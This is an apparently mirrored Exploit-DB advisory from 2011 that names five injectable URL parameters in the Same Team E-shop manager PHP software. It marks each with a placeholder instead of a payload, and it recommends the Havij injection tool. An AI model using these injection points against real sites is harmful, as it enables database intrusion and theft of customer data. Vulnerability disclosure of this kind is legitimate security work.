Same Team E-shop manager – SQL Injection - 体验盒子

作者： Number 7

日期： 2011-06-22

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/17431/

# Exploit Title: [Same Team E-shop manager SQL Injection exploit]
# Date: [19-06-2011]
# Author: [Number 7]
# Software Link: [http://www.sameteam.com.tn/site/fr/eshop-manager.23.html]
# Tested on: [Linux]
_____________________________________________________________________________
exploits:
http://www.domain.com.tn/path/catalogue.php?id_shop=7[SQLI]

http://www.domain.com.tn/path/article.php?id_article=7[SQLI]

http://www.domain.com.tn/path/banniere.php?id_article=7[SQLI]

http://www.domain.com.tn/path/detail_news.php?id_article=7[SQLI]

http://www.domain.com.tn/path/detail_produit.php?id_shop=3&ref=200308G[SQLI]

----------------------------------------_----------------------------------------


Use Havij :^D it's fastest for the 4th version :D
_____________________________________________________________________________
############ Made in Tunisia +216 ############
[~] Greetz tO: [Shichemt-Älen/Ares/SWAT/S-MAN/Wx #all tunisian hackers]
[~] Home : Tunisia :^D
############ Made in Tunisia +216 ############